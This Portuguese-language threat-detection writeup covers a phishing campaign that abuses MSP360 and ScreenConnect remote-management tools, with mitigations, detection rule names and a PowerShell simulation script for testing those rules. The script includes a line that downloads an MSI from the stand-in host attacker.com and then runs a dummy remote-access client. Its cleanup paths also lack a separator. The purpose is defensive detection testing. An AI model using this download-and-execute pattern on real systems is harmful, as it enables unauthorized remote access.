Phishing Abusa de Ferramentas RMM Para Acesso Persistente
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Os atores de ameaça estão utilizando campanhas de phishing para entregar um instalador legítimo do MSP360 RMM disfarçado como software confiável. Uma vez lançado, o instalador estabelece persistência e posteriormente baixa e implanta o ConnectWise ScreenConnect, proporcionando aos atacantes um canal adicional de acesso remoto. Isso permite atividades pós-comprometimento adicionais, incluindo roubo de credenciais e coleta de dados sensíveis.
Investigação
Os Especialistas da Microsoft Defender identificaram vários atrativos de phishing se passando por Zoom, Adobe e convites de reunião legítimos para distribuir o MSP360 v2.5.0.67. Os pesquisadores reconstruíram a cadeia de infecção, rastreando a execução inicial do usuário e a elevação de UAC através da instalação de serviço e implantação de ferramentas RMM secundárias. A investigação também revelou que os atacantes abusam de plataformas de nuvem confiáveis, incluindo Amazon S3 e Dropbox, para hospedar cargas maliciosas.
Mitigação
As organizações devem controlar estritamente as ferramentas RMM aprovadas aplicando MFA e implementando políticas de Controle de Aplicativos para evitar instalações não autorizadas. Regras de bloqueio baseadas em certificado podem restringir ainda mais aplicativos assinados específicos. O fortalecimento das defesas de endpoint através da proteção antivírus entregue pela nuvem e regras de Redução de Superfície de Ataque também é essencial para reduzir a exposição.
Resposta
Quando instalações RMM não autorizadas são descobertas, as equipes de segurança devem redefinir imediatamente as credenciais associadas às instalações de serviço afetadas. Suspeita de comprometimento de contas de nível de sistema requer uma investigação abrangente para determinar o escopo completo do ataque. Revisar logs de detecção de endpoint para identificar sessões de gerenciamento remoto suspeitas e atividades relacionadas ao pós-comprometimento.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Download ou Upload via Powershell (via cmdline)
Execução de Mudança de Página de Código Incomum (via cmdline)
Software de Acesso / Gestão Remota Alternativa (via process_creation)
Chamar Métodos .NET Suspeitos do Powershell (via powershell)
Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via dns)
IOCs (HashSha256) para detectar: Phishing Abusa Ferramentas RMM para Acesso Persistente
IOCs (HashSha1) para detectar: Phishing Abusa Ferramentas RMM para Acesso Persistente
Detectar Invoke-WebRequest do PowerShell para Download de Pacote MSI Remoto [Windows Powershell]
Phishing Abusa Ferramentas RMM para Acesso Persistente [Criação de Processo do Windows]
Execução de Simulação
-
Narrativa de Ataque & Comandos: Um adversário inicia uma campanha de spearphishing. A vítima clica em um link que aciona um comando PowerShell de uma linha. Este comando usa
Invoke-WebRequestpara baixarClientSetup.msi(simulando o instalador do ScreenConnect) de um servidor remoto. Uma vez baixado, o atacante executa o MSI, e o passo final da simulação envolve o lançamento deScreenConnect.WindowsClient.exepara imitar a sessão de acesso remoto estabelecida. Esta sequência é projetada para acionar oselection_2 AND selection_3lógica da regra. -
Script de Teste de Regressão:
# Simulação de Implementação de RMM Baseada em Phishing $tempDir = $env:TEMP $msiName = "ClientSetup.msi" $exeName = "ScreenConnect.WindowsClient.exe" $msiPath = Join-Path $tempDir $msiName $exePath = Join-Path $tempDir $exeName # 1. Simular o Download PowerShell (Parte A da Seleção 2) Write-Host "[+] Simulando download de MSI via PowerShell..." # Usando um arquivo fictício para simular o download do MSI New-Item -Path $msiPath -ItemType File -Force # Este comando corresponde à lógica da regra 'Invoke-WebRequest' e 'ClientSetup.msi' powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'" # 2. Criar um executável fictício para simular o cliente ScreenConnect (Seleção 3) Write-Host "[+] Criando executável fictício do ScreenConnect..." New-Item -Path $exePath -ItemType File -Force # 3. Executar o cliente (Seleção 3 e conclusão da Seleção 2) Write-Host "[+] Executando Cliente ScreenConnect..." Start-Process -FilePath $exePath -
Comandos de Limpeza:
# Limpar artefatos de simulação Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue Write-Host "[+] Limpeza completa."